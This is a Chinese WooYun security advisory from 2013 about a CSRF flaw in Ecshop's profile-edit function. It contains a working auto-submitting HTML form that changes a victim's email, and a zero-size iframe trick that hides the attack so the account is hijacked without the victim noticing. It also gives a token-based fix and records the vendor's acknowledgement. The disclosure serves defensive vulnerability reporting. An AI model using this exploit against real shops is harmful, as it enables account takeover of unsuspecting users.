当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024625

漏洞标题:Ecshop csrf可劫持用户账号

相关厂商:ShopEx

漏洞作者: VIP

提交时间:2013-05-27 20:02

修复时间:2013-08-25 20:02

公开时间:2013-08-25 20:02

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-27: 细节已通知厂商并且等待厂商处理中
2013-05-27: 厂商已经确认,细节仅向厂商公开
2013-05-30: 细节向第三方安全合作伙伴开放
2013-07-21: 细节向核心白帽子及相关领域专家公开
2013-07-31: 细节向普通白帽子公开
2013-08-10: 细节向实习白帽子公开
2013-08-25: 细节向公众公开

简要描述:

详细说明:

修改个人信息处未验证token,可通过一个精心构造的表单强制用户修改邮箱,达到劫持用户的目的,劫持用户账号只需要欺骗目标用户点击一个链接。
POC:

<form id="csrf" action="http://127.0.0.1/ecshop/user.php" method="POST">
<input type="hidden" name="email" value="root@wooyun.org">
<input type="hidden" name="extend_field1" value="x@x.com">
<input type="hidden" name="extend_field2" value="123123">
<input type="hidden" name="extend_field3" value="11111111">
<input type="hidden" name="extend_field4" value="11111111">
<input type="hidden" name="extend_field5" value="11111111111">
<input type="hidden" name="sel_question" value="friend_birthday">
<input type="hidden" name="passwd_answer" value="x">
<input type="hidden" name="act" value="act_edit_profile">
</form>
<script>csrf.submit()</script>


欺骗用户访问后,会自动提交表单,修改用户邮箱。

漏洞证明:

访问前

01.jpg


访问时

02.jpg


访问后(邮箱被修改)

03.jpg


然而,访问这个表单,自动提交后,会跳转到修改成功的页面,被用户看到,这显然不是我们想要的结果。所以,作为一个完美主义者,我们可以准备另一个正常的页面(如一个新闻页面),然后iframe 这个POC,并且height=0,width=0,这样用户可能就会在不经意之间被劫持账号了,代码如下:

<iframe src="POC.htm" height="0" width="0"></iframe>


劫持成功后,就可以去修改密码喽

04.jpg

修复方案:

涉及用户信息的操作都应该验证随机的token

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-05-27 20:08

厂商回复:

感谢您为shopex安全做的贡献
我们会尽快处理
非常感谢

最新状态:

暂无